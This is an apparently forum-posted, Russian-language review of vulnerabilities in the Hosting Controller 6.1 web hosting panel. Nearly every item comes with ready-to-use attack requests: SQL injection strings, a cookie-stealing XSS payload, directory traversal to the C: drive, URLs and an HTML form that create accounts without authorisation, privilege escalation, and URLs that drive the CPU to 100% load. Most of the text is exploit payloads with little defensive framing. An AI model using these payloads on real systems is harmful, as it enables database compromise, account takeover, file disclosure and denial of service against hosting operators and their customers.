Привет Представляю вашему вниманию небольшой озбор уязвимостей в CMS Hosting Controller. Уязвимости в Hosting Controller Site: http://www.hostingcontroller.com Exploits/Shellcode Hosting Controller <= 0.6.1 Hotfix 1.4 Directory Browsing Vulnerability Hosting Controller <= 0.6.1 Unauthenticated User Registration Exploit Hosting Controller <= 0.6.1 Unauthenticated User Registeration (2nd) Hosting Controller <= 0.6.1 Unauthenticated User Registeration (3rd) Hosting Controller <= 0.6.1 HotFix 2.1 Change Credit Limit Exploit Hosting Controller <= 6.1 HotFix 2.2 Add Domain without Quota Exploit Hosting Controller <= 6.1 Hotfix 3.1 Privilege Escalation Vulnerability Hosting Controller <= 6.1 Hotfix 3.2 Remote Unauthenticated Vulns Hosting Controller 6.1 Hot fix <= 3.3 Multiple Remote Vulnerabilities Hosting Controller 6.1 Hotfix <= 3.2 SQL Injection 1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "ForumID" в сценариях DisableForum.asp и EnableForum.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример: Code: http://[host]/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1 http://[host]/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1 2. Уязвимость существует из-за ошибки проверки прав пользователя при доступе к определенным сценариям. Удаленный пользователь может создать и удалить виртуальные директории произвольных сайтов с помощью сценариев DisableForum.asp и EnableForum.asp. Пример: Code: http://[host]/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&ForumID=1 http://[host]/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID= Hosting Controller v.6.1 & prior XSS Уязвимость существует из-за недостаточной обработки входных данных в параметре "error" в сценарии error.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример: Code: http://target:/admin/hosting/error.asp?error=<script>alert(document.cookie)</script> Обход ограничений безопасности в Hosting Controller 6.1 HotFix 2.2 Уязвимость позволяет удаленному авторизованному пользователю добавить имена пользователей на системе. Удаленный авторизованный пользователь может послать специально сформированный HTTP запрос сценарию 'AccountActions.asp' и добавить имена пользователей на системе. Exploit 1. Удаленный авторизованный пользователь может вызвать сценарий 'planmanagerstep1.asp' и добавить планы к своей учетной записи. 2. Удаленный авторизованный пользователь может отредактировать и просмотреть планы, доступные на сервере. Примеры: Code: http://[target]/admin/hosting/plandetails.asp?hostcustid=[EVERY PLAN NUMBER!] http://[target]/admin/hosting/plandetails.asp?hostcustid=1 or 1=1 http://[target]/admin/hosting/editplanopt1.asp?planid=[EVERY PLAN NUMBER!] http://[target]/admin/hosting/editplanopt2.asp?planid=[EVERY PLAN NUMBER!] 3. Уязвимость обнаружена в сценарии 'IISActions.asp'. Удаленный авторизованный пользователь может создать домен или под-домен без квот. Hosting Controller 6.1 HotFix 2.1 SQL Injection Уязвимость позволяет удаленному авторизованному пользователю выполнить произвольные SQL команды в базе данных приложения и вызвать отказ в обслуживании системы. 1. Уязвимость существует из-за недостаточной обработки входных данных в сценарии 'listreason.asp'. Удаленный авторизованный пользователь может выполнить произвольные SQL команды в базе данных приложения. Пример: Code: http://[target]/admin/accounts/listreason.asp?ListReaso n=tester'%20or%20'1'='1 2. Удаленный авторизованный пользователь может с помощью специально сформированного URL вызвать 100% загрузку процессора. Пример: Code: http://[target]/admin/hosting/editplanopt3.asp http://[target]/admin/AdminSettings/plansettings.asp?action=1 http://[target]/admin/ hosting/planmanager.asp?action=3&planid=2 http://[target]/admin/hosting/planmanager.asp http://[target]/admin/hosting/planmanager.asp?action=3&planid=1 3. Удаленный авторизованный пользователь может послать сценарию '/admin/hosting/addsubsite_online.asp' специально сформированный POST запрос и создать новую учетную запись в приложении. Пример: Code: <FORM action="http://[target]/admin/hosting/addsubsite_online.asp" method="post"> < INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1"> Domain: <INPUT name="DomainName" value="hcegroup.net" id="Hidden2"><BR> Username: <INPUT name="loginname" value="kehieuhoc" id="Hidden3"><BR> < INPUT type="hidden" name="Quota" value="-1" id="Hidden4"> < INPUT type="hidden" name="htype" value="27" id="htype5" > < INPUT type="hidden" name="choice" value="1" id="Hidden6" > Password: <INPUT name="password" value="kehieuhoc" id="Hidden7"><BR><BR> < input type="submit" value="Make"> < /FORM> 4. Удаленный авторизованный пользователь может создать сессию со специальными привилегиями с помощью URL: Code: http://[target]/admin/hosting/dsp_newreseller.asp 5. SQL-инъекция возможна из-за недостаточной фильтрации входных данных в полях формы поиска в сценариях 'IISManagerDB.asp' и 'AccountManager.asp'. Удаленный авторизованный пользователь может послать специально сформированный запрос и выполнить произвольные SQL команды в базе данных приложения. Пример: Code: 'or'1'='1'or'1'='1 Hosting Controller 6.1 HotFix 2.0 SQL Injection 1. Уязвимость существует при обработке входных данных в параметре 'resourceid' сценария 'resellerresources.asp'. Удаленный авторизованный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Пример: Code: http://[target]/admin/hosting/resellerresources.asp? action=2&jresourceid=1%20or%201=1 2. Удаленный авторизованный пользователь может с помощью специально сформированного URL просмотреть данные других пользователей. Пример: Code: http://[target]/admin/hosting/plandetails.asp?hostcustid=[PlanID] Обход авторизации в Hosting Controller 6.1 Hotfix 1.9 Уязвимость существует в сценарии 'admin/hosting/addsubsite.asp'. Удаленный пользователь может послать специально сформированные данные и создать нового пользователя и новую учетную запись хоста. Пример: Code: http://[target]/admin/hosting/addsubsite.asp? loginname=Mouse&password =123456 http://[target]:8077/hosting/addsubsite.asp? loginname=Mouse&password=123456 Обход каталога в Hosting Controller v.6.1 Hotfix 1.4 Обнаружена уязвимость в Hosting Controller. Удаленный авторизованный пользователь может просмотреть произвольные файлы на системе. Уязвимость существует в файлах 'Statsbrowse.asp' и 'Generalbrowser.asp' из-за некорректной фильтрации входных данных. Пример: Code: http://[target]/admin/mail/Statsbrowse.asp?FilePath=c:\&Opt=3&level=1&upflag=0 http://[target]/admin/iis/Generalbrowse.asp?FilePath=C:\